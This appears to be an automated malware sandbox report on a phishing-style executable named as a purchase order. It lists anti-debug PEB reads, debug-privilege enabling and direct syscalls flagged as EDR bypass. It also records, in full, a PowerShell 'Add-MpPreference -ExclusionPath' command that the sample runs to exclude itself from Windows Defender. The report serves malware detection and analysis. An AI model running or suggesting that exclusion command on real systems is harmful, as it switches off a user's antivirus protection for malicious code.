Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5866E mov eax, dword ptr fs:[00000030h] 4_2_01C5866E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5866E mov eax, dword ptr fs:[00000030h] 4_2_01C5866E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC2674 mov eax, dword ptr fs:[00000030h] 4_2_01BC2674
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E609 mov eax, dword ptr fs:[00000030h] 4_2_01C0E609
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA660 mov eax, dword ptr fs:[00000030h] 4_2_01BCA660
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA660 mov eax, dword ptr fs:[00000030h] 4_2_01BCA660
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAC640 mov eax, dword ptr fs:[00000030h] 4_2_01BAC640
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C269C0 mov eax, dword ptr fs:[00000030h] 4_2_01C269C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B909AD mov eax, dword ptr fs:[00000030h] 4_2_01B909AD
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B909AD mov eax, dword ptr fs:[00000030h] 4_2_01B909AD
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5A9D3 mov eax, dword ptr fs:[00000030h] 4_2_01C5A9D3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1E9E0 mov eax, dword ptr fs:[00000030h] 4_2_01C1E9E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC29F9 mov eax, dword ptr fs:[00000030h] 4_2_01BC29F9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC29F9 mov eax, dword ptr fs:[00000030h] 4_2_01BC29F9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A9D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A9D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A9D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A9D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A9D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A9D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC49D0 mov eax, dword ptr fs:[00000030h] 4_2_01BC49D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C189B3 mov esi, dword ptr fs:[00000030h] 4_2_01C189B3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C189B3 mov eax, dword ptr fs:[00000030h] 4_2_01C189B3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C189B3 mov eax, dword ptr fs:[00000030h] 4_2_01C189B3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64940 mov eax, dword ptr fs:[00000030h] 4_2_01C64940
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C10946 mov eax, dword ptr fs:[00000030h] 4_2_01C10946
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B88918 mov eax, dword ptr fs:[00000030h] 4_2_01B88918
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B88918 mov eax, dword ptr fs:[00000030h] 4_2_01B88918
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C34978 mov eax, dword ptr fs:[00000030h] 4_2_01C34978
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C34978 mov eax, dword ptr fs:[00000030h] 4_2_01C34978
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1C97C mov eax, dword ptr fs:[00000030h] 4_2_01C1C97C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E908 mov eax, dword ptr fs:[00000030h] 4_2_01C0E908
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E908 mov eax, dword ptr fs:[00000030h] 4_2_01C0E908
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD096E mov eax, dword ptr fs:[00000030h] 4_2_01BD096E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD096E mov edx, dword ptr fs:[00000030h] 4_2_01BD096E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD096E mov eax, dword ptr fs:[00000030h] 4_2_01BD096E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1C912 mov eax, dword ptr fs:[00000030h] 4_2_01C1C912
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB6962 mov eax, dword ptr fs:[00000030h] 4_2_01BB6962
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB6962 mov eax, dword ptr fs:[00000030h] 4_2_01BB6962
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB6962 mov eax, dword ptr fs:[00000030h] 4_2_01BB6962
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C2892B mov eax, dword ptr fs:[00000030h] 4_2_01C2892B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1892A mov eax, dword ptr fs:[00000030h] 4_2_01C1892A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C608C0 mov eax, dword ptr fs:[00000030h] 4_2_01C608C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5A8E4 mov eax, dword ptr fs:[00000030h] 4_2_01C5A8E4
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90887 mov eax, dword ptr fs:[00000030h] 4_2_01B90887
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCC8F9 mov eax, dword ptr fs:[00000030h] 4_2_01BCC8F9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCC8F9 mov eax, dword ptr fs:[00000030h] 4_2_01BCC8F9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1C89D mov eax, dword ptr fs:[00000030h] 4_2_01C1C89D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE8C0 mov eax, dword ptr fs:[00000030h] 4_2_01BBE8C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA830 mov eax, dword ptr fs:[00000030h] 4_2_01BCA830
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h] 4_2_01BB2835
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h] 4_2_01BB2835
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h] 4_2_01BB2835
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB2835 mov ecx, dword ptr fs:[00000030h] 4_2_01BB2835
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h] 4_2_01BB2835
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h] 4_2_01BB2835
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C26870 mov eax, dword ptr fs:[00000030h] 4_2_01C26870
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C26870 mov eax, dword ptr fs:[00000030h] 4_2_01C26870
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1E872 mov eax, dword ptr fs:[00000030h] 4_2_01C1E872
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1E872 mov eax, dword ptr fs:[00000030h] 4_2_01C1E872
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1C810 mov eax, dword ptr fs:[00000030h] 4_2_01C1C810
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B94859 mov eax, dword ptr fs:[00000030h] 4_2_01B94859
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B94859 mov eax, dword ptr fs:[00000030h] 4_2_01B94859
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC0854 mov eax, dword ptr fs:[00000030h] 4_2_01BC0854
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3483A mov eax, dword ptr fs:[00000030h] 4_2_01C3483A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3483A mov eax, dword ptr fs:[00000030h] 4_2_01C3483A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA2840 mov ecx, dword ptr fs:[00000030h] 4_2_01BA2840
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0BBE mov eax, dword ptr fs:[00000030h] 4_2_01BA0BBE
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0BBE mov eax, dword ptr fs:[00000030h] 4_2_01BA0BBE
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3EBD0 mov eax, dword ptr fs:[00000030h] 4_2_01C3EBD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1CBF0 mov eax, dword ptr fs:[00000030h] 4_2_01C1CBF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBEBFC mov eax, dword ptr fs:[00000030h] 4_2_01BBEBFC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B98BF0 mov eax, dword ptr fs:[00000030h] 4_2_01B98BF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B98BF0 mov eax, dword ptr fs:[00000030h] 4_2_01B98BF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B98BF0 mov eax, dword ptr fs:[00000030h] 4_2_01B98BF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB0BCB mov eax, dword ptr fs:[00000030h] 4_2_01BB0BCB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB0BCB mov eax, dword ptr fs:[00000030h] 4_2_01BB0BCB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB0BCB mov eax, dword ptr fs:[00000030h] 4_2_01BB0BCB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90BCD mov eax, dword ptr fs:[00000030h] 4_2_01B90BCD
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90BCD mov eax, dword ptr fs:[00000030h] 4_2_01B90BCD
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90BCD mov eax, dword ptr fs:[00000030h] 4_2_01B90BCD
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C44BB0 mov eax, dword ptr fs:[00000030h] 4_2_01C44BB0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C44BB0 mov eax, dword ptr fs:[00000030h] 4_2_01C44BB0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C38B42 mov eax, dword ptr fs:[00000030h] 4_2_01C38B42
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C26B40 mov eax, dword ptr fs:[00000030h] 4_2_01C26B40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C26B40 mov eax, dword ptr fs:[00000030h] 4_2_01C26B40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5AB40 mov eax, dword ptr fs:[00000030h] 4_2_01C5AB40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C44B4B mov eax, dword ptr fs:[00000030h] 4_2_01C44B4B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C44B4B mov eax, dword ptr fs:[00000030h] 4_2_01C44B4B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C62B57 mov eax, dword ptr fs:[00000030h] 4_2_01C62B57
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C62B57 mov eax, dword ptr fs:[00000030h] 4_2_01C62B57
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C62B57 mov eax, dword ptr fs:[00000030h] 4_2_01C62B57
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C62B57 mov eax, dword ptr fs:[00000030h] 4_2_01C62B57
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3EB50 mov eax, dword ptr fs:[00000030h] 4_2_01C3EB50
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBEB20 mov eax, dword ptr fs:[00000030h] 4_2_01BBEB20
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBEB20 mov eax, dword ptr fs:[00000030h] 4_2_01BBEB20
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8CB7E mov eax, dword ptr fs:[00000030h] 4_2_01B8CB7E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64B00 mov eax, dword ptr fs:[00000030h] 4_2_01C64B00
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h] 4_2_01C0EB1D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h] 4_2_01C0EB1D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h] 4_2_01C0EB1D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h] 4_2_01C0EB1D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h] 4_2_01C0EB1D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h] 4_2_01C0EB1D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h] 4_2_01C0EB1D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h] 4_2_01C0EB1D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h] 4_2_01C0EB1D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B88B50 mov eax, dword ptr fs:[00000030h] 4_2_01B88B50
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C58B28 mov eax, dword ptr fs:[00000030h] 4_2_01C58B28
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C58B28 mov eax, dword ptr fs:[00000030h] 4_2_01C58B28
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B98AA0 mov eax, dword ptr fs:[00000030h] 4_2_01B98AA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B98AA0 mov eax, dword ptr fs:[00000030h] 4_2_01B98AA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE6AA4 mov eax, dword ptr fs:[00000030h] 4_2_01BE6AA4
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC8A90 mov edx, dword ptr fs:[00000030h] 4_2_01BC8A90
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h] 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h] 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h] 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h] 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h] 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h] 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h] 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h] 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h] 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64A80 mov eax, dword ptr fs:[00000030h] 4_2_01C64A80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCAAEE mov eax, dword ptr fs:[00000030h] 4_2_01BCAAEE
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCAAEE mov eax, dword ptr fs:[00000030h] 4_2_01BCAAEE
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90AD0 mov eax, dword ptr fs:[00000030h] 4_2_01B90AD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC4AD0 mov eax, dword ptr fs:[00000030h] 4_2_01BC4AD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC4AD0 mov eax, dword ptr fs:[00000030h] 4_2_01BC4AD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE6ACC mov eax, dword ptr fs:[00000030h] 4_2_01BE6ACC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE6ACC mov eax, dword ptr fs:[00000030h] 4_2_01BE6ACC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE6ACC mov eax, dword ptr fs:[00000030h] 4_2_01BE6ACC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB4A35 mov eax, dword ptr fs:[00000030h] 4_2_01BB4A35
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB4A35 mov eax, dword ptr fs:[00000030h] 4_2_01BB4A35
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBEA2E mov eax, dword ptr fs:[00000030h] 4_2_01BBEA2E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCCA24 mov eax, dword ptr fs:[00000030h] 4_2_01BCCA24
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3EA60 mov eax, dword ptr fs:[00000030h] 4_2_01C3EA60
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0CA72 mov eax, dword ptr fs:[00000030h] 4_2_01C0CA72
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0CA72 mov eax, dword ptr fs:[00000030h] 4_2_01C0CA72
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1CA11 mov eax, dword ptr fs:[00000030h] 4_2_01C1CA11
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCCA6F mov eax, dword ptr fs:[00000030h] 4_2_01BCCA6F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCCA6F mov eax, dword ptr fs:[00000030h] 4_2_01BCCA6F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCCA6F mov eax, dword ptr fs:[00000030h] 4_2_01BCCA6F
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe" Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtTerminateThread: Direct from: 0x76F02FCC Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
